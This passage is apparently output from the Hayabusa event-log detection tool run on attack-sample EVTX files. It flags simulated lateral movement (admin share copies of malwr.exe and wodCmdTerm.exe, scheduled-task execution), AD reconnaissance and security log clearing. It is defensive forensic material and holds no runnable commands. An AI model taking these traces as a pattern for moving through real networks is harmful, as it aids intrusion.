Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.319 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\CYAlyNSS timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 